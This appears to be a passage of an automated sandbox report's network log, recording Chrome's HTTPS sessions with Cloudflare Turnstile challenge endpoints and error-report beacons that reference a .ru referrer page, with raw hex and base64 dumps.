                                                      2025-01-14 15:11:25 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                      Data Ascii: PNGIHDRsIDAT$IENDB`


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      14192.168.2.749734104.18.95.414433232C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-14 15:11:25 UTC1171OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1388961222:1736863973:GZGEH0pIw0BU0Gk3FFCEuy8by8CZFsaUV52txd7bA3s/901e8eeb3e1dc337/UKdFAV8735A.fnyP9jwvLCzYUUCicqviSOTpl0y47QA-1736867483-1.1.1.1-s2.BR4GeipckaJLuZ.uJDVn2lHya14qp0yokk3FDojg3VhgSENeOY1eLHm9OzyAN HTTP/1.1
                                                      Host: challenges.cloudflare.com
                                                      Connection: keep-alive
                                                      Content-Length: 3162
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      Content-type: application/x-www-form-urlencoded
                                                      CF-Chl-RetryAttempt: 0
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      CF-Challenge: UKdFAV8735A.fnyP9jwvLCzYUUCicqviSOTpl0y47QA-1736867483-1.1.1.1-s2.BR4GeipckaJLuZ.uJDVn2lHya14qp0yokk3FDojg3VhgSENeOY1eLHm9OzyAN
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Origin: https://challenges.cloudflare.com
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/ipdm4/0x4AAAAAAA3RtpCTVu7-vpVs/auto/fbE/normal/auto/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-14 15:11:25 UTC3162OUTData Raw: 76 5f 39 30 31 65 38 65 65 62 33 65 31 64 63 33 33 37 3d 59 70 35 77 39 77 63 77 6e 77 79 77 42 4f 7a 73 4f 7a 4b 77 4f 41 24 5a 4c 6b 41 7a 50 4f 33 33 7a 43 30 7a 24 25 32 62 77 4f 48 7a 57 77 24 35 6b 24 4d 48 35 7a 46 71 48 7a 75 45 4f 34 59 7a 55 77 4f 4b 35 7a 24 36 66 70 49 6a 7a 36 5a 7a 65 7a 4f 70 7a 36 35 6c 2b 7a 30 7a 49 2b 24 33 7a 5a 2b 71 35 7a 6e 6a 2b 49 6b 46 7a 62 46 71 42 32 53 43 43 38 58 7a 70 65 2b 49 78 7a 37 33 73 72 58 67 45 68 76 76 38 68 39 61 77 75 58 7a 6d 51 41 7a 30 53 35 68 54 7a 24 4a 5a 7a 4f 72 7a 59 64 36 78 64 4e 69 7a 71 78 78 30 76 55 61 4d 31 46 58 31 32 75 33 7a 69 68 70 33 30 46 55 7a 71 64 72 7a 71 31 31 59 7a 7a 72 68 77 4f 4f 7a 75 70 7a 2d 77 49 48 6b 4d 33 4f 51 2b 4f 31 7a 57 54 5a 74 37 52 67 7a 6f 78 70
                                                      Data Ascii: v_901e8eeb3e1dc337=Yp5w9wcwnwywBOzsOzKwOA$ZLkAzPO33zC0z$%2bwOHzWw$5k$MH5zFqHzuEO4YzUwOK5z$6fpIjz6ZzezOpz65l+z0zI+$3zZ+q5znj+IkFzbFqB2SCC8Xzpe+Ixz73srXgEhvv8h9awuXzmQAz0S5hTz$JZzOrzYd6xdNizqxx0vUaM1FX12u3zihp30FUzqdrzq11YzzrhwOOzupz-wIHkM3OQ+O1zWTZt7Rgzoxp
                                                      2025-01-14 15:11:25 UTC751INHTTP/1.1 200 OK
                                                      Date: Tue, 14 Jan 2025 15:11:25 GMT
                                                      Content-Type: text/plain; charset=UTF-8
                                                      Content-Length: 153048
                                                      Connection: close
                                                      cf-chl-gen: bUd+Q1lkVzRcdNP3TkLGclXWjIUH/qK2ZI94iXC01YDK87POM1fzwU6UYD95BTtgm6SjcEf/lfuraeVnRSy/Y4jOPVg7NZHqNtsFCN3h3lFt48ur1W1JxMAs0ohaN/GHd0ZTgWtZ0Wk+ap1clLHa0d5Iq/ynolqkNaYm9o60U4ukDeG4aDmX3VwfeFpURB32bsRhQNVRacRJSZRyCk3t0PCPrYBQHhBu4SIp1a0gZqx0W3ownO2AA1gWCtcmMaRvRlIb3FKaBoEVI7LaLlKORxydtv+U/J5RZ6d3McM5NcD0mkHFONU4OsPvyuhT+IdkpW49mEeNOOgmc2nnEv4fQT1HwXqPQh+AzeO7UZvYud4zuzTYJCMrcu4MIeTWoPnZK1yIzff8aI6XDEbnxhoylzSRqv61mpXwy7IFi0iSuHaavHS/cFS4YDgUgQEXGNdBBSVWObn228mxCm0WDPjVzKxUourn1LCjPpzSEmFqQwc=$vrBmSRTQ04Z/6Rg9qQIsWw==
                                                      Server: cloudflare
                                                      CF-RAY: 901e8ef6391c42c6-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2025-01-14 15:11:25 UTC618INData Raw: 59 35 65 58 61 5a 57 4e 6c 4a 52 79 66 48 4b 67 6c 4a 65 47 6f 5a 2b 53 67 4b 57 6e 70 57 65 69 71 57 79 6c 67 59 64 7a 6a 59 61 30 6f 36 32 74 74 58 69 74 6a 5a 4e 2f 6d 5a 37 46 6d 59 61 37 77 59 53 31 6d 5a 2f 48 67 49 33 48 79 71 54 51 77 38 65 32 31 4e 61 73 78 37 48 59 71 38 62 63 7a 37 33 43 6f 64 7a 64 31 75 4c 66 34 61 50 66 34 71 72 6d 71 65 6d 73 79 38 48 4b 33 71 2b 7a 38 38 79 7a 74 2f 62 31 75 37 2f 35 36 66 72 33 2f 63 44 62 31 64 76 63 34 64 62 46 34 66 76 77 38 41 72 45 33 65 30 47 7a 39 4d 53 41 68 73 54 46 67 62 62 32 51 38 66 37 64 37 57 45 66 54 2b 45 65 44 35 2b 50 59 76 35 76 73 4a 4d 79 4d 74 44 50 41 59 38 76 67 6d 2b 44 66 75 46 54 77 38 43 6a 38 57 52 51 49 79 2b 42 45 53 4e 45 49 4d 4a 68 6f 6a 53 7a 6b 71 4c 6a 49 52 52 7a 59
                                                      Data Ascii: Y5eXaZWNlJRyfHKglJeGoZ+SgKWnpWeiqWylgYdzjYa0o62ttXitjZN/mZ7FmYa7wYS1mZ/HgI3HyqTQw8e21Nasx7HYq8bcz73Codzd1uLf4aPf4qrmqemsy8HK3q+z88yzt/b1u7/56fr3/cDb1dvc4dbF4fvw8ArE3e0Gz9MSAhsTFgbb2Q8f7d7WEfT+EeD5+PYv5vsJMyMtDPAY8vgm+DfuFTw8Cj8WRQIy+BESNEIMJhojSzkqLjIRRzY
                                                      2025-01-14 15:11:25 UTC1369INData Raw: 56 68 50 47 59 37 62 6b 46 78 4f 6b 39 71 5a 31 39 49 62 46 5a 4d 52 47 6c 49 54 55 77 78 65 54 4e 4c 57 31 39 37 55 33 53 48 68 57 64 31 57 56 68 6b 6b 47 43 53 6a 48 39 6c 6b 49 46 68 56 47 4e 72 65 58 52 30 5a 34 70 2f 6d 70 6c 74 6c 4b 4e 33 64 57 68 70 64 32 65 45 6a 71 4b 51 6f 61 4b 77 6f 36 65 64 68 36 4f 4c 74 59 57 6d 68 58 4f 4e 69 6e 6c 38 72 72 75 5a 73 70 32 67 73 4a 79 47 67 61 7a 4b 74 37 32 34 75 36 6d 6b 6c 4d 53 6b 76 39 58 61 71 63 32 73 32 4d 65 6e 73 39 4b 75 30 72 6a 5a 6f 38 65 65 6e 2b 6e 6a 70 36 69 2f 33 36 65 76 7a 73 48 42 74 4c 36 79 36 66 4c 55 39 2f 4c 64 33 4f 33 35 2f 64 6a 31 2b 67 4f 34 41 67 45 45 39 67 59 46 44 76 6f 4b 43 52 50 2b 44 67 30 55 41 78 49 52 44 67 63 57 46 52 4d 4c 47 68 6b 55 44 78 34 64 47 52 4d 69 49
                                                      Data Ascii: VhPGY7bkFxOk9qZ19IbFZMRGlITUwxeTNLW197U3SHhWd1WVhkkGCSjH9lkIFhVGNreXR0Z4p/mpltlKN3dWhpd2eEjqKQoaKwo6edh6OLtYWmhXONinl8rruZsp2gsJyGgazKt724u6mklMSkv9Xaqc2s2Mens9Ku0rjZo8een+njp6i/36evzsHBtL6y6fLU9/Ld3O35/dj1+gO4AgEE9gYFDvoKCRP+Dg0UAxIRDgcWFRMLGhkUDx4dGRMiI
                                                      2025-01-14 15:11:25 UTC1369INData Raw: 35 57 31 4a 63 62 45 41 77 54 46 6b 76 52 48 55 37 52 6a 42 76 64 58 78 4c 68 44 31 46 66 47 56 42 53 59 42 5a 52 55 32 45 53 45 6c 52 69 49 64 4e 56 59 74 2f 6a 4a 4e 53 6e 46 56 64 6b 32 36 4c 6a 4a 71 50 58 4b 47 6b 6b 49 52 70 6f 70 53 49 62 4b 61 59 6a 58 79 71 6e 4a 46 2f 72 71 43 56 67 72 4b 6b 6d 59 57 32 71 4a 32 66 75 71 79 68 6f 72 36 77 70 61 58 43 74 4b 6d 31 6e 4b 2f 48 76 73 61 7a 6c 4b 4c 4b 74 38 76 55 7a 72 76 4e 6e 64 4b 2f 33 61 76 44 33 64 57 77 35 61 62 52 36 4c 6a 6e 31 74 33 57 70 72 71 2f 32 38 72 54 72 37 54 6d 34 73 62 4b 38 2f 54 39 76 4d 69 32 34 50 66 4e 30 72 79 2f 31 50 76 6c 35 2b 48 66 36 63 6e 4d 37 2b 76 6a 33 51 38 52 42 77 44 52 45 75 72 74 47 50 30 4f 46 51 41 59 34 74 55 41 49 65 55 56 45 2f 37 63 41 2f 66 6e 34 42
                                                      Data Ascii: 5W1JcbEAwTFkvRHU7RjBvdXxLhD1FfGVBSYBZRU2ESElRiIdNVYt/jJNSnFVdk26LjJqPXKGkkIRpopSIbKaYjXyqnJF/rqCVgrKkmYW2qJ2fuqyhor6wpaXCtKm1nK/HvsazlKLKt8vUzrvNndK/3avD3dWw5abR6Ljn1t3Wprq/28rTr7Tm4sbK8/T9vMi24PfN0ry/1Pvl5+Hf6cnM7+vj3Q8RBwDREurtGP0OFQAY4tUAIeUVE/7cA/fn4B
                                                      2025-01-14 15:11:25 UTC1369INData Raw: 59 44 46 6e 59 32 51 31 62 6d 64 6f 4f 58 46 72 62 44 31 77 66 6d 2b 4a 61 47 46 30 52 58 64 35 52 30 6d 49 55 48 46 52 6a 32 69 53 61 46 4a 77 6c 58 43 52 62 4a 4b 65 62 34 43 61 58 48 4e 66 6c 6d 5a 33 59 35 70 72 66 6f 79 66 6d 61 47 71 74 47 71 43 67 4b 2b 77 72 48 69 46 68 37 79 6d 77 4a 65 74 71 73 53 42 6b 37 4c 45 6f 4a 6d 4b 75 61 43 64 69 36 61 6f 6e 73 75 50 78 4b 61 67 77 4e 69 34 6f 70 57 62 33 74 6a 58 6d 4c 54 43 33 35 79 69 74 39 6e 6d 79 72 66 6c 74 36 62 68 76 4b 72 6c 36 73 76 6f 35 37 58 32 74 76 58 46 35 64 62 63 79 63 2b 38 33 74 48 42 77 73 34 47 78 2f 44 32 39 4f 41 4c 42 2b 54 4e 42 67 38 41 33 41 51 52 41 77 67 43 2b 65 58 57 39 4f 7a 36 33 2f 50 32 33 76 37 63 2f 4f 37 2b 48 79 48 6f 42 66 6a 74 4c 42 6a 35 4c 54 41 63 43 6a 45
                                                      Data Ascii: YDFnY2Q1bmdoOXFrbD1wfm+JaGF0RXd5R0mIUHFRj2iSaFJwlXCRbJKeb4CaXHNflmZ3Y5prfoyfmaGqtGqCgK+wrHiFh7ymwJetqsSBk7LEoJmKuaCdi6aonsuPxKagwNi4opWb3tjXmLTC35yit9nmyrflt6bhvKrl6svo57X2tvXF5dbcyc+83tHBws4Gx/D29OALB+TNBg8A3AQRAwgC+eXW9Oz63/P23v7c/O7+HyHoBfjtLBj5LTAcCjE
                                                      2025-01-14 15:11:25 UTC1369INData Raw: 56 78 4e 56 6a 35 57 57 46 56 33 50 46 74 6d 69 56 31 57 65 6f 53 4e 54 59 64 72 63 4a 4a 6c 55 49 64 32 63 49 2b 5a 61 48 32 48 6d 71 42 72 65 34 4e 72 64 32 46 34 6c 35 2b 42 65 4b 47 6a 6f 61 71 68 70 71 5a 6b 72 61 79 6e 6f 72 47 77 72 4b 61 31 74 4c 57 7a 75 5a 61 33 6c 72 4b 39 67 35 61 64 71 4c 6c 38 77 4d 47 4c 71 72 66 43 6b 61 75 37 30 37 61 72 77 61 7a 51 31 62 65 75 31 4e 6d 37 72 4d 4c 52 77 4a 72 4f 72 74 48 51 36 71 66 72 72 4b 50 48 33 36 32 71 37 72 44 63 73 37 50 6e 31 66 54 77 78 64 57 76 31 39 6b 43 31 62 72 37 2b 4c 33 75 33 66 77 44 79 4e 54 47 42 2b 7a 62 2f 65 48 76 35 41 50 32 34 74 58 55 34 39 49 57 46 2f 37 5a 48 2f 41 43 48 76 6e 64 46 67 41 43 4a 69 55 6d 2f 43 34 50 47 65 77 46 45 67 6f 75 4c 41 73 69 41 69 45 7a 45 78 63 32
                                                      Data Ascii: VxNVj5WWFV3PFtmiV1WeoSNTYdrcJJlUId2cI+ZaH2HmqBre4Nrd2F4l5+BeKGjoaqhpqZkraynorGwrKa1tLWzuZa3lrK9g5adqLl8wMGLqrfCkau707arwazQ1beu1Nm7rMLRwJrOrtHQ6qfrrKPH362q7rDcs7Pn1fTwxdWv19kC1br7+L3u3fwDyNTGB+zb/eHv5AP24tXU49IWF/7ZH/ACHvndFgACJiUm/C4PGewFEgouLAsiAiEzExc2
                                                      2025-01-14 15:11:25 UTC1369INData Raw: 63 2f 56 6b 43 44 55 58 6c 2f 6a 59 52 63 5a 6c 74 50 55 6f 4e 79 6a 59 36 55 62 49 61 48 6e 47 36 64 6d 5a 2b 59 63 6e 56 65 63 58 4e 35 65 6e 35 69 71 70 56 2f 65 5a 61 42 59 6e 6d 52 67 6d 79 48 6a 72 69 4b 73 70 4b 57 73 70 56 35 6c 4a 36 4d 6a 4a 33 42 78 59 61 45 6d 38 48 49 77 61 6e 44 78 36 61 6f 77 62 44 41 71 72 2b 6a 79 49 36 72 71 73 32 34 30 35 79 79 75 74 47 62 77 72 72 50 73 39 69 65 75 37 72 64 79 4f 4f 73 77 73 72 68 71 39 4c 4b 33 38 50 6f 72 73 76 46 2b 63 72 4b 32 50 33 52 77 63 41 45 76 74 62 6b 2b 4f 50 35 41 38 4c 55 79 74 72 6b 78 75 30 41 36 77 67 46 35 42 51 44 43 67 4d 64 32 65 73 49 35 39 2f 7a 34 68 4c 34 2f 76 67 67 49 53 50 6f 39 66 6f 67 48 53 49 4e 37 43 77 73 35 6a 41 79 43 6a 45 79 4e 77 38 6c 39 42 6a 39 4e 42 77 68 47
                                                      Data Ascii: c/VkCDUXl/jYRcZltPUoNyjY6UbIaHnG6dmZ+YcnVecXN5en5iqpV/eZaBYnmRgmyHjriKspKWspV5lJ6MjJ3BxYaEm8HIwanDx6aowbDAqr+jyI6rqs2405yyutGbwrrPs9ieu7rdyOOswsrhq9LK38PorsvF+crK2P3RwcAEvtbk+OP5A8LUytrkxu0A6wgF5BQDCgMd2esI59/z4hL4/vggISPo9fogHSIN7Cws5jAyCjEyNw8l9Bj9NBwhG
                                                      2025-01-14 15:11:25 UTC1369INData Raw: 66 56 31 31 6c 5a 6d 46 4b 61 46 36 56 6b 5a 47 41 55 47 56 33 55 6f 70 64 64 58 56 58 63 6e 6c 35 70 46 32 6a 68 49 56 79 67 6e 69 6b 6a 71 57 58 70 70 79 78 67 4b 4f 6c 73 5a 4b 44 6a 59 75 4d 73 35 4b 48 6b 6e 4b 42 6f 4b 4c 43 6f 37 54 45 68 38 6e 45 77 35 79 2f 70 4d 6e 42 6d 6f 6d 79 74 61 61 56 73 4e 48 4f 71 73 75 5a 73 62 65 6f 72 62 4c 5a 75 72 6a 53 32 65 4c 45 33 36 61 34 31 36 75 36 33 73 72 77 37 72 4b 73 73 63 6a 66 38 71 2f 70 37 37 4b 34 79 75 7a 67 32 4e 4d 46 76 4e 48 64 34 63 55 44 34 63 48 37 44 76 59 4e 34 41 49 41 2f 67 55 58 44 78 6e 4b 35 77 54 78 32 74 66 63 39 67 41 57 34 52 77 64 47 42 30 6f 38 51 67 4d 35 53 30 4b 44 67 59 5a 4b 42 49 69 4c 77 50 31 4b 51 59 73 44 2b 30 64 4f 6a 41 63 47 53 45 64 4c 42 38 2b 47 55 42 44 41 44
                                                      Data Ascii: fV11lZmFKaF6VkZGAUGV3UopddXVXcnl5pF2jhIVygnikjqWXppyxgKOlsZKDjYuMs5KHknKBoKLCo7TEh8nEw5y/pMnBmomytaaVsNHOqsuZsbeorbLZurjS2eLE36a416u63srw7rKsscjf8q/p77K4yuzg2NMFvNHd4cUD4cH7DvYN4AIA/gUXDxnK5wTx2tfc9gAW4RwdGB0o8QgM5S0KDgYZKBIiLwP1KQYsD+0dOjAcGSEdLB8+GUBDAD
                                                      2025-01-14 15:11:25 UTC1369INData Raw: 6b 48 35 6c 6b 5a 65 49 6d 5a 6d 46 6a 4a 46 50 63 33 32 54 59 57 47 63 65 58 42 66 58 56 35 33 6f 33 56 6e 5a 34 46 36 6a 4b 57 47 70 36 71 74 71 71 2b 43 63 5a 65 61 6b 4c 79 32 6b 6f 69 7a 71 33 31 37 70 4c 6d 51 76 4b 71 34 74 61 75 58 7a 4b 33 50 72 6f 32 68 7a 6f 76 46 7a 4e 48 50 6d 6f 33 52 32 4a 71 52 30 5a 32 69 6c 5a 61 75 76 39 6a 6b 6f 2b 4f 39 31 4f 50 6b 72 74 6a 69 36 75 7a 68 37 63 66 72 31 75 58 62 78 50 4c 50 37 74 6a 73 32 38 34 42 76 75 58 67 35 37 36 2f 43 67 58 36 43 4f 51 51 36 42 50 6e 37 67 38 4b 36 68 6a 50 46 4f 33 57 36 65 76 30 33 51 30 63 47 68 77 56 46 79 59 67 2f 69 49 6d 33 53 4d 69 45 42 48 73 4a 41 45 69 4c 51 63 45 38 77 6b 55 38 42 30 56 4c 6a 44 31 39 68 41 38 52 44 73 45 47 30 68 48 50 68 34 48 47 68 77 6c 44 6a 31
                                                      Data Ascii: kH5lkZeImZmFjJFPc32TYWGceXBfXV53o3VnZ4F6jKWGp6qtqq+CcZeakLy2koizq317pLmQvKq4tauXzK3Pro2hzovFzNHPmo3R2JqR0Z2ilZauv9jko+O91OPkrtji6uzh7cfr1uXbxPLP7tjs284BvuXg576/CgX6COQQ6BPn7g8K6hjPFO3W6ev03Q0cGhwVFyYg/iIm3SMiEBHsJAEiLQcE8wkU8B0VLjD19hA8RDsEG0hHPh4HGhwlDj1
                                                      2025-01-14 15:11:25 UTC1369INData Raw: 4a 71 54 6b 46 52 77 64 70 39 53 6d 6e 6d 44 68 5a 39 78 6c 48 69 53 65 49 46 38 6e 36 61 6e 71 62 4b 43 71 70 56 79 6e 35 65 4a 71 6f 61 34 75 36 39 30 70 33 6d 54 75 6e 71 53 6b 37 42 35 73 63 61 33 70 36 7a 4f 78 34 6d 49 70 4b 72 54 68 73 36 75 74 37 6e 61 6d 4c 47 63 6e 4c 66 50 6e 64 76 65 6f 4a 61 66 6f 39 66 4a 33 4f 44 71 7a 61 54 58 76 37 6a 4e 30 65 50 52 7a 4f 2f 79 78 72 54 32 75 73 72 4d 79 4f 66 66 2b 39 48 6b 39 72 33 61 2b 4c 2f 7a 76 50 66 34 76 77 66 36 2b 4d 6b 47 34 65 51 4a 38 75 76 33 37 65 55 58 2b 67 7a 76 48 74 34 55 33 4f 7a 75 38 66 34 65 42 69 6a 6e 4b 43 77 46 49 67 34 69 4a 4f 7a 70 46 50 50 31 41 52 67 34 37 43 67 58 2b 54 63 73 4e 79 77 33 48 7a 39 48 48 67 68 47 43 6b 70 45 54 43 4d 6a 51 30 77 79 49 31 41 75 54 69 6c 4e
                                                      Data Ascii: JqTkFRwdp9SmnmDhZ9xlHiSeIF8n6anqbKCqpVyn5eJqoa4u690p3mTunqSk7B5sca3p6zOx4mIpKrThs6ut7namLGcnLfPndveoJafo9fJ3ODqzaTXv7jN0ePRzO/yxrT2usrMyOff+9Hk9r3a+L/zvPf4vwf6+MkG4eQJ8uv37eUX+gzvHt4U3Ozu8f4eBijnKCwFIg4iJOzpFPP1ARg47CgX+TcsNyw3Hz9HHghGCkpETCMjQ0wyI1AuTilN


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      15192.168.2.74973535.190.80.14433232C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-14 15:11:25 UTC544OUTOPTIONS /report/v4?s=STDMai5FCe%2FxVgtmq82CVdIFbVQ%2FkkxjbFk68xVQSF9k7DsZTCb7MdSgpsC6Yb0ArlyuycI3jlcOH%2FjA96B4%2FddYyqVoZ%2FByo6CDjA%2FnjPUqcQ4AhGnsUAr3RLH%2BOA%3D%3D HTTP/1.1
                                                      Host: a.nel.cloudflare.com
                                                      Connection: keep-alive
                                                      Origin: https://2ol.itectaxice.ru
                                                      Access-Control-Request-Method: POST
                                                      Access-Control-Request-Headers: content-type
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-14 15:11:25 UTC336INHTTP/1.1 200 OK
                                                      Content-Length: 0
                                                      access-control-max-age: 86400
                                                      access-control-allow-methods: OPTIONS, POST
                                                      access-control-allow-origin: *
                                                      access-control-allow-headers: content-length, content-type
                                                      date: Tue, 14 Jan 2025 15:11:25 GMT
                                                      Via: 1.1 google
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      16192.168.2.74973835.190.80.14433232C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-14 15:11:26 UTC484OUTPOST /report/v4?s=STDMai5FCe%2FxVgtmq82CVdIFbVQ%2FkkxjbFk68xVQSF9k7DsZTCb7MdSgpsC6Yb0ArlyuycI3jlcOH%2FjA96B4%2FddYyqVoZ%2FByo6CDjA%2FnjPUqcQ4AhGnsUAr3RLH%2BOA%3D%3D HTTP/1.1
                                                      Host: a.nel.cloudflare.com
                                                      Connection: keep-alive
                                                      Content-Length: 428
                                                      Content-Type: application/reports+json
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-14 15:11:26 UTC428OUTData Raw: 5b 7b 22 61 67 65 22 3a 31 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 34 34 33 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 32 6f 6c 2e 69 74 65 63 74 61 78 69 63 65 2e 72 75 2f 51 6d 37 35 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 38 38 2e 31 31 34 2e 39 36 2e 33 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22
                                                      Data Ascii: [{"age":1,"body":{"elapsed_time":443,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://2ol.itectaxice.ru/Qm75/","sampling_fraction":1.0,"server_ip":"188.114.96.3","status_code":404,"type":"http.error"},"type":"network-error","
                                                      2025-01-14 15:11:26 UTC168INHTTP/1.1 200 OK
                                                      Content-Length: 0
                                                      date: Tue, 14 Jan 2025 15:11:25 GMT
                                                      Via: 1.1 google
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      17192.168.2.749739104.18.94.414433232C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-14 15:11:26 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1388961222:1736863973:GZGEH0pIw0BU0Gk3FFCEuy8by8CZFsaUV52txd7bA3s/901e8eeb3e1dc337/UKdFAV8735A.fnyP9jwvLCzYUUCicqviSOTpl0y47QA-1736867483-1.1.1.1-s2.BR4GeipckaJLuZ.uJDVn2lHya14qp0yokk3FDojg3VhgSENeOY1eLHm9OzyAN HTTP/1.1
                                                      Host: challenges.cloudflare.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-14 15:11:26 UTC442INHTTP/1.1 400 Bad Request
                                                      Date: Tue, 14 Jan 2025 15:11:26 GMT
                                                      Content-Type: application/json
                                                      Content-Length: 14
                                                      Connection: close
                                                      cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                      cf-chl-out: WqVsdsEcsXxYOmHsNum/Y/3IBFmwZZn1frXjhhTGkIro70vdgKJUrAfYEmNC1tzvePvFThlw4igqgnP/pvLsJw==$SFFlzDfkg3hNYo2D0Ckm5Q==
                                                      Server: cloudflare
                                                      CF-RAY: 901e8efd5f907c81-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2025-01-14 15:11:26 UTC14INData Raw: 7b 22 65 72 72 22 3a 31 30 30 32 33 30 7d
                                                      Data Ascii: {"err":100230}


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      18192.168.2.749740104.18.95.414433232C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-14 15:11:26 UTC811OUTGET /cdn-cgi/challenge-platform/h/b/pat/901e8eeb3e1dc337/1736867485183/844ee1c3a71c8134456f00e78e0c84bc733cc76369eb27f0341e9bb6f1468708/Y_EY6Ha2KYLod_Z HTTP/1.1
                                                      Host: challenges.cloudflare.com
                                                      Connection: keep-alive
                                                      Cache-Control: max-age=0
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/ipdm4/0x4AAAAAAA3RtpCTVu7-vpVs/auto/fbE/normal/auto/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-14 15:11:26 UTC143INHTTP/1.1 401 Unauthorized
                                                      Date: Tue, 14 Jan 2025 15:11:26 GMT
                                                      Content-Type: text/plain; charset=utf-8
                                                      Content-Length: 1
                                                      Connection: close
                                                      2025-01-14 15:11:26 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 68 45 37 68 77 36 63 63 67 54 52 46 62 77 44 6e 6a 67 79 45 76 48 4d 38 78 32 4e 70 36 79 66 77 4e 42 36 62 74 76 46 47 68 77 67 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
